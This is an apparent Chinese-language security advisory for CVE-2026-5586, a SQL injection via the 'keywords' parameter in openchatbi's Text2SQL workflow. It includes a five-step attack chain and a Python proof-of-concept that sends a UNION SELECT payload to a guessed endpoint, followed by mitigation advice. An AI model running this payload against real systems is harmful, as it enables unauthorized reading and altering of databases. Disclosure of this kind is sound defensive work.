CVE-2026-5586: openchatbi SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5586

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

zhongyu09 openchatbi

漏洞概述

zhongyu09开发的openchatbi软件在0.2.1及之前的版本中存在安全漏洞。该漏洞位于多阶段Text2SQL工作流组件的未知功能中。由于对用户提供的参数`keywords`缺乏适当的过滤或验证，攻击者可以通过精心构造的恶意输入来操纵SQL查询。这导致SQL注入漏洞的产生，使得攻击者能够在数据库上执行任意SQL命令。攻击者无需用户交互即可远程发起攻击，利用此漏洞可能导致敏感信息泄露、数据篡改或服务不可用。

技术细节

该漏洞的根源在于openchatbi的多阶段Text2SQL工作流组件在处理用户输入时存在逻辑缺陷。具体而言，当应用接收到包含`keywords`参数的请求时，直接将其拼接到后续的SQL查询语句中，未经过严格的预编译或参数化处理。由于CVSS向量显示攻击复杂度低（AC:L）且需要低权限（PR:L），这意味着已登录的攻击者或低权限用户即可利用此漏洞。攻击者可以通过发送包含特定SQL元字符（如单引号、注释符、UNION SELECT等）的HTTP请求，欺骗后端数据库执行非预期的命令。由于漏洞通过网络（AV:N）触发且无需用户交互（UI:N），攻击范围较广。成功的利用可能导致数据库中的敏感数据（如用户凭据、业务数据）被读取（C:L），数据被非法修改或删除（I:L），甚至导致数据库服务响应缓慢或崩溃（A:L）。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是zhongyu09 openchatbi，且版本低于或等于0.2.1。

STEP 2

定位

攻击者找到Multi-stage Text2SQL Workflow组件的API接口端点。

STEP 3

构造载荷

攻击者针对`keywords`参数构造恶意的SQL注入Payload，例如使用UNION SELECT语句试图提取数据。

STEP 4

执行攻击

攻击者向目标服务器发送包含恶意Payload的HTTP POST请求。

STEP 5

达成效果

后端数据库执行了攻击者注入的SQL语句，导致数据泄露（C:L）、数据篡改（I:L）或服务中断（A:L）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sqli(target_url, payload):
    """
    Exploit SQL Injection in openchatbi Text2SQL Workflow.
    """
    # The vulnerable endpoint might be part of the workflow API
    url = f"{target_url}/api/workflow/text2sql"
    
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "CVE-2026-5586-Scanner"
    }
    
    # Malicious payload targeting the 'keywords' argument
    # Example: Extracting database version using error-based or union-based injection
    data = {
        "keywords": f"test' UNION SELECT 1, version(), 3, 4-- -"
    }
    
    try:
        response = requests.post(url, json=data, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print(f"[+] Response: {response.text}")
            # Check if the payload is reflected in the response or error message
            if "mysql" in response.text.lower() or "syntax error" in response.text.lower():
                print("[+] Potential SQL Injection confirmed.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080" # Replace with actual target
    exploit_sqli(target, "")

影响范围

zhongyu09 openchatbi <= 0.2.1

防御指南

临时缓解措施

建议立即检查受影响系统的版本，并尽快联系供应商获取修复补丁或升级至安全版本。在未升级前，应严格限制对Text2SQL工作流组件的网络访问权限，部署Web应用防火墙（WAF）以拦截常见的SQL注入攻击特征，并加强对数据库日志的审计，以便及时发现异常查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5586
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5586
3 Details https://www.cvedetails.com/cve/CVE-2026-5586/
4 VulDB https://vuldb.com/cve/CVE-2026-5586
5 Link https://github.com/Ka7arotto/cve/blob/main/openchatbi-SQL/issue.md
6 Link https://github.com/zhongyu09/openchatbi/
7 Link https://github.com/zhongyu09/openchatbi/issues/11
8 Link https://vuldb.com/submit/784454
9 Link https://vuldb.com/vuln/355385
10 Link https://vuldb.com/vuln/355385/cti